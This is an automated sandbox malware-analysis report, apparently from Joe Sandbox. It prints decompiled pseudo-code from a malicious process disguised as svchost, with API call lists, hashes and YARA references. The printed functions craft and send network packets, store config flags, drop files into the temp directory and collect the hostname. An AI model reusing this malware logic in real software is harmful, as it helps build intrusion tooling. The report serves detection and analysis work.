							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x2522bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x2522bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x2522bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

























                                                                                                                                  0x02512704
                                                                                                                                  0x02512706
                                                                                                                                  0x0251270b
                                                                                                                                  0x02512715
                                                                                                                                  0x02512718
                                                                                                                                  0x0251271d
                                                                                                                                  0x0251271e
                                                                                                                                  0x0251271e
                                                                                                                                  0x02512726
                                                                                                                                  0x0251272e
                                                                                                                                  0x02512734
                                                                                                                                  0x0251273a
                                                                                                                                  0x02512740
                                                                                                                                  0x02512743
                                                                                                                                  0x0251274e
                                                                                                                                  0x02512752
                                                                                                                                  0x02512754
                                                                                                                                  0x0251275a
                                                                                                                                  0x0251275e
                                                                                                                                  0x02512764
                                                                                                                                  0x02512766
                                                                                                                                  0x0251276a
                                                                                                                                  0x02512770
                                                                                                                                  0x02512774
                                                                                                                                  0x0251277a
                                                                                                                                  0x0251277e
                                                                                                                                  0x02512784
                                                                                                                                  0x02512788
                                                                                                                                  0x0251278a
                                                                                                                                  0x0251278a
                                                                                                                                  0x0251278d
                                                                                                                                  0x025127a0
                                                                                                                                  0x02512795
                                                                                                                                  0x02512797
                                                                                                                                  0x0251279d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251279d
                                                                                                                                  0x00000000
                                                                                                                                  0x02512795
                                                                                                                                  0x025127a9
                                                                                                                                  0x025127ad
                                                                                                                                  0x025127b9
                                                                                                                                  0x025127b3
                                                                                                                                  0x025127b7
                                                                                                                                  0x025127b8
                                                                                                                                  0x025127b8
                                                                                                                                  0x025127c2
                                                                                                                                  0x025127c4
                                                                                                                                  0x025127c4
                                                                                                                                  0x025127c5
                                                                                                                                  0x025127c7
                                                                                                                                  0x0251278a
                                                                                                                                  0x025127ce
                                                                                                                                  0x025127d2
                                                                                                                                  0x025127d2
                                                                                                                                  0x025127d5
                                                                                                                                  0x025127d7
                                                                                                                                  0x025127df
                                                                                                                                  0x025127e3
                                                                                                                                  0x025127e5
                                                                                                                                  0x025127f0
                                                                                                                                  0x02512802
                                                                                                                                  0x02512815

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251272E
                                                                                                                                  • htons.WS2_32(00000001), ref: 02512752
                                                                                                                                  • htons.WS2_32(0000000F), ref: 025127D5
                                                                                                                                  • htons.WS2_32(00000001), ref: 025127E3
                                                                                                                                  • sendto.WS2_32(?,02522BF8,00000009,00000000,00000010,00000010), ref: 02512802
                                                                                                                                    • Part of subcall function 0251EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0251EBFE,7FFF0001,?,0251DB55,7FFF0001), ref: 0251EBD3
                                                                                                                                    • Part of subcall function 0251EBCC: RtlAllocateHeap.NTDLL(00000000,?,0251DB55,7FFF0001), ref: 0251EBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1128258776-3142137124
                                                                                                                                  • Opcode ID: cabf81f59e2e20955d419b0d8034b312f28b6645f382f7c9f10785707d6e847a
                                                                                                                                  • Instruction ID: 30136d78e67a828164c2456156d2f285b1742a00d20fe139770bc8baf811aa95
                                                                                                                                  • Opcode Fuzzy Hash: cabf81f59e2e20955d419b0d8034b312f28b6645f382f7c9f10785707d6e847a
                                                                                                                                  • Instruction Fuzzy Hash: 723150386843969FEB208F74D480A627B60FF1A318F6B485DEC55CB392D732D459EB18
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251E8A1 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0251E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0251DD05();
				_t150 = _a4;
				_t158 = E0251DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E02512419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0251EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0251EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E025124C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x25236c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0251EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0251EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0251EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0251EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0251EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E025124C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0251DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0251EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0251DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E025124C2( &_v20, 0, 0);
				E0251DF4C(_t146,  &_v56);
				_t158 = E0251DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

























                                                                                                                                  0x0251e8a1
                                                                                                                                  0x0251e8ac
                                                                                                                                  0x0251e8af
                                                                                                                                  0x0251e8b7
                                                                                                                                  0x0251e8c0
                                                                                                                                  0x0251e8c3
                                                                                                                                  0x0251e8c6
                                                                                                                                  0x0251e917
                                                                                                                                  0x0251e91a
                                                                                                                                  0x0251e932
                                                                                                                                  0x0251e93a
                                                                                                                                  0x0251e93a
                                                                                                                                  0x0251e943
                                                                                                                                  0x0251e947
                                                                                                                                  0x0251e94a
                                                                                                                                  0x0251e96a
                                                                                                                                  0x0251e96d
                                                                                                                                  0x0251e971
                                                                                                                                  0x0251e974
                                                                                                                                  0x0251e94c
                                                                                                                                  0x0251e94f
                                                                                                                                  0x0251e95c
                                                                                                                                  0x0251e95f
                                                                                                                                  0x0251e962
                                                                                                                                  0x0251e965
                                                                                                                                  0x0251e965
                                                                                                                                  0x0251e979
                                                                                                                                  0x0251ea3a
                                                                                                                                  0x0251ea4f
                                                                                                                                  0x0251ea59
                                                                                                                                  0x0251ea5d
                                                                                                                                  0x0251ea68
                                                                                                                                  0x0251ea6a
                                                                                                                                  0x0251ea6d
                                                                                                                                  0x0251ea6d
                                                                                                                                  0x0251e97f
                                                                                                                                  0x0251e985
                                                                                                                                  0x0251e98f
                                                                                                                                  0x0251e994
                                                                                                                                  0x0251e9a1
                                                                                                                                  0x0251e9a6
                                                                                                                                  0x0251e9b8
                                                                                                                                  0x0251e9c0
                                                                                                                                  0x0251e9c7
                                                                                                                                  0x0251e9dd
                                                                                                                                  0x0251ea02
                                                                                                                                  0x0251ea0c
                                                                                                                                  0x0251ea16
                                                                                                                                  0x0251ea19
                                                                                                                                  0x0251ea22
                                                                                                                                  0x0251ea28
                                                                                                                                  0x0251ea28
                                                                                                                                  0x0251e994
                                                                                                                                  0x0251ea77
                                                                                                                                  0x0251ea77
                                                                                                                                  0x0251ea83
                                                                                                                                  0x0251ea83
                                                                                                                                  0x0251e8d1
                                                                                                                                  0x0251e8d4
                                                                                                                                  0x0251e8d7
                                                                                                                                  0x0251e8de
                                                                                                                                  0x0251e8ea
                                                                                                                                  0x0251e8ed
                                                                                                                                  0x0251e8f5
                                                                                                                                  0x0251e8fc
                                                                                                                                  0x0251e90a
                                                                                                                                  0x0251e90c
                                                                                                                                  0x0251e911
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251DD05: GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                    • Part of subcall function 0251DD05: InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                    • Part of subcall function 0251DD05: GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                    • Part of subcall function 0251DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0251DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0251E3A7,000000F0), ref: 0251DDB5
                                                                                                                                  • lstrcpynA.KERNEL32(?,02511E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0251EAAA,?,?), ref: 0251E8DE
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0251EAAA,?,?,00000001,?,02511E84,?), ref: 0251E935
                                                                                                                                  • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0251EAAA,?,?,00000001,?,02511E84,?,0000000A), ref: 0251E93D
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0251EAAA,?,?,00000001,?,02511E84,?), ref: 0251E94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                                                                  • String ID: flags_upd$localcfg
                                                                                                                                  • API String ID: 204374128-3505511081
                                                                                                                                  • Opcode ID: 978059c5951b0a7feac348d0cf35e6ca5279edf358bcfee95c1acb6f424c4021
                                                                                                                                  • Instruction ID: a46cf1b0f84230449bbe787d85b1521412acd9f9df8a40274f0b710f569fb2c8
                                                                                                                                  • Opcode Fuzzy Hash: 978059c5951b0a7feac348d0cf35e6ca5279edf358bcfee95c1acb6f424c4021
                                                                                                                                  • Instruction Fuzzy Hash: 5D513E72D0020AAFDB11EFA8C985DAEBBFAFF48304F14456AE805A7250D775EA14CF54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02516BA7 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                  			E02516BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x25230ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x25230ac() == 0) {
						_t28 = E0251EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x25230ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0251EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0251EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0251EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}









                                                                                                                                  0x02516bab
                                                                                                                                  0x02516bba
                                                                                                                                  0x02516bc4
                                                                                                                                  0x02516bc7
                                                                                                                                  0x02516bd2
                                                                                                                                  0x02516be4
                                                                                                                                  0x02516be9
                                                                                                                                  0x02516c03
                                                                                                                                  0x02516c03
                                                                                                                                  0x02516beb
                                                                                                                                  0x02516bee
                                                                                                                                  0x02516bef
                                                                                                                                  0x02516bfa
                                                                                                                                  0x02516c1a
                                                                                                                                  0x02516c23
                                                                                                                                  0x02516c28
                                                                                                                                  0x02516c3e
                                                                                                                                  0x02516c44
                                                                                                                                  0x02516c47
                                                                                                                                  0x02516c5a
                                                                                                                                  0x02516c61
                                                                                                                                  0x02516c66
                                                                                                                                  0x02516c49
                                                                                                                                  0x02516c49
                                                                                                                                  0x02516c52
                                                                                                                                  0x00000000
                                                                                                                                  0x02516c52
                                                                                                                                  0x02516c2a
                                                                                                                                  0x02516c2a
                                                                                                                                  0x02516c2b
                                                                                                                                  0x02516c30
                                                                                                                                  0x02516c30
                                                                                                                                  0x02516bfc
                                                                                                                                  0x02516bfd
                                                                                                                                  0x00000000
                                                                                                                                  0x02516c02
                                                                                                                                  0x02516bfa
                                                                                                                                  0x02516bd4
                                                                                                                                  0x02516bd4
                                                                                                                                  0x02516bd4
                                                                                                                                  0x02516c6e
                                                                                                                                  0x02516bbc
                                                                                                                                  0x02516bbf
                                                                                                                                  0x02516bbf

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3609698214-0
                                                                                                                                  • Opcode ID: f151adfbd96549aa852d473c942436265d7feb3503177224f2f5b01faff6daa7
                                                                                                                                  • Instruction ID: 352386952dfbc31c92e8b30cced713d2cfee4a4628a44d0ce28ea93e7504ad00
                                                                                                                                  • Opcode Fuzzy Hash: f151adfbd96549aa852d473c942436265d7feb3503177224f2f5b01faff6daa7
                                                                                                                                  • Instruction Fuzzy Hash: F2218176905106FFFB215B60ED49DAF7EACEB45368B114815F502E10C0EB319A18EA7C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02519064 Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E02519064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E02518274( &_v1032);
				_t29 = E0251ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0251ECA5() % _t62);
				_push(E0251ECA5() % _t62);
				_push(E0251ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E02512544(0x25222f8, 0x2520794, 0xf, 0xe4, 0xc8));
				E0251EE2A(_t62, 0x25222f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








                                                                                                                                  0x0251907b
                                                                                                                                  0x02519088
                                                                                                                                  0x0251908e
                                                                                                                                  0x02519095
                                                                                                                                  0x0251909c
                                                                                                                                  0x025190a8
                                                                                                                                  0x025190b4
                                                                                                                                  0x025190c9
                                                                                                                                  0x025190ca
                                                                                                                                  0x025190e9
                                                                                                                                  0x025190f8
                                                                                                                                  0x02519114
                                                                                                                                  0x02519118
                                                                                                                                  0x00000000
                                                                                                                                  0x0251913f
                                                                                                                                  0x0251912d
                                                                                                                                  0x02519134
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTempPathA.KERNEL32(00000400,?,00000000,025222F8), ref: 0251907B
                                                                                                                                  • wsprintfA.USER32 ref: 025190E9
                                                                                                                                  • CreateFileA.KERNEL32(025222F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0251910E
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 02519122
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0251912D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02519134
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2439722600-0
                                                                                                                                  • Opcode ID: 618076ec87d916d21c560678cba5aac374a35e8eb7773f3366e22b4d8192c685
                                                                                                                                  • Instruction ID: 4088c5479a0f39ded911437532134e4ba557f9d96963ce9cbcfc8b095f55e83e
                                                                                                                                  • Opcode Fuzzy Hash: 618076ec87d916d21c560678cba5aac374a35e8eb7773f3366e22b4d8192c685
                                                                                                                                  • Instruction Fuzzy Hash: 8811DDB6A411147BF7256A31DC0EFAF366EEBD5700F008465BB06E50C0EA704E159A68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251DD05 Relevance: 9.0, APIs: 6, Instructions: 34threadsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x25236b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x25236b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x25236bc =  *0x25236bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x25236bc =  *0x25236bc + 1;
					 *0x25236b8 = _t4;
					return _t4;
				}
				goto L7;
			}





                                                                                                                                  0x0251dd17
                                                                                                                                  0x0251dd41
                                                                                                                                  0x0251dd2c
                                                                                                                                  0x0251dd37
                                                                                                                                  0x0251dd4c
                                                                                                                                  0x0251dd39
                                                                                                                                  0x0251dd3b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251dd3b
                                                                                                                                  0x0251dd37
                                                                                                                                  0x0251dd53
                                                                                                                                  0x0251dd53
                                                                                                                                  0x0251dd59
                                                                                                                                  0x0251dd62
                                                                                                                                  0x0251dd68
                                                                                                                                  0x0251dd68
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0251DD20
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251DD2E
                                                                                                                                  • Sleep.KERNEL32(00000000,?,761B43E0,?,00000000,0251E538,?,761B43E0,?,00000000,?,0251A445), ref: 0251DD3B
                                                                                                                                  • InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3819781495-0
                                                                                                                                  • Opcode ID: 6c6b89cf75bec3703a8b641a9e6801122677c31e45ad0e93f9a53cae21cbb52b
                                                                                                                                  • Instruction ID: 2853ed3b961fac033693a7421d1fb9d9647cc0b627fbdc4512809cb0f99e6ab3
                                                                                                                                  • Opcode Fuzzy Hash: 6c6b89cf75bec3703a8b641a9e6801122677c31e45ad0e93f9a53cae21cbb52b
                                                                                                                                  • Instruction Fuzzy Hash: 39F0E971987104AFF7606F65A884B353BBAF767351F420855E109D21C0C724646DEF2D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251AD08 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55stringnetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}









                                                                                                                                  0x0251ad1c
                                                                                                                                  0x0251ad24
                                                                                                                                  0x0251ad71
                                                                                                                                  0x0251ad74
                                                                                                                                  0x0251ad77
                                                                                                                                  0x0251ad88
                                                                                                                                  0x0251ad88
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ad7f
                                                                                                                                  0x0251ad26
                                                                                                                                  0x0251ad29
                                                                                                                                  0x0251ad2c
                                                                                                                                  0x0251ad2f
                                                                                                                                  0x0251ad55
                                                                                                                                  0x0251ad35
                                                                                                                                  0x0251ad3d
                                                                                                                                  0x0251ad45
                                                                                                                                  0x0251ad4d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ad4d
                                                                                                                                  0x0251ad45
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ad4f
                                                                                                                                  0x0251ad4f
                                                                                                                                  0x0251ad4f
                                                                                                                                  0x0251ad51
                                                                                                                                  0x0251ad52
                                                                                                                                  0x0251ad52
                                                                                                                                  0x0251ad53
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ad53
                                                                                                                                  0x0251ad35
                                                                                                                                  0x0251ad60
                                                                                                                                  0x0251ad66
                                                                                                                                  0x0251ad69
                                                                                                                                  0x0251ad6b
                                                                                                                                  0x0251ad6b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 0251AD1C
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0251AD60
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0251AD69
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0251AD7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$gethostnamelstrcpy
                                                                                                                                  • String ID: LocalHost
                                                                                                                                  • API String ID: 3695455745-3154191806
                                                                                                                                  • Opcode ID: a8a00b7a3eafad20af17732cc645621ecbe273243805ec826bcfb185d2caca9a
                                                                                                                                  • Instruction ID: 2af4829531964ba2f3932752322f41cf46a2c2b38fc2d0719038444f76443e18
                                                                                                                                  • Opcode Fuzzy Hash: a8a00b7a3eafad20af17732cc645621ecbe273243805ec826bcfb185d2caca9a
                                                                                                                                  • Instruction Fuzzy Hash: 3A01492088758A5DFF331A38C444BB83F767B9760AF400055E4C08B195EF24844BC79D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02514280 Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02514280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E02514000(E02513ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0251ECA5();
					E02513F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E02513F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E02513F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E02513F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0251EBCC(_t73);
						 *_t74 = 0x5e;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x252215a =  *0x252215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E02513F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0251EC2E(_t74);
						E02513F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}
















                                                                                                                                  0x02514280
                                                                                                                                  0x02514290
                                                                                                                                  0x02514296
                                                                                                                                  0x0251429b
                                                                                                                                  0x025142b1
                                                                                                                                  0x025142ba
                                                                                                                                  0x025143c1
                                                                                                                                  0x025143ca
                                                                                                                                  0x025143cd
                                                                                                                                  0x00000000
                                                                                                                                  0x025143ce
                                                                                                                                  0x025142c0
                                                                                                                                  0x025142c3
                                                                                                                                  0x025142c8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025142dc
                                                                                                                                  0x025142e6
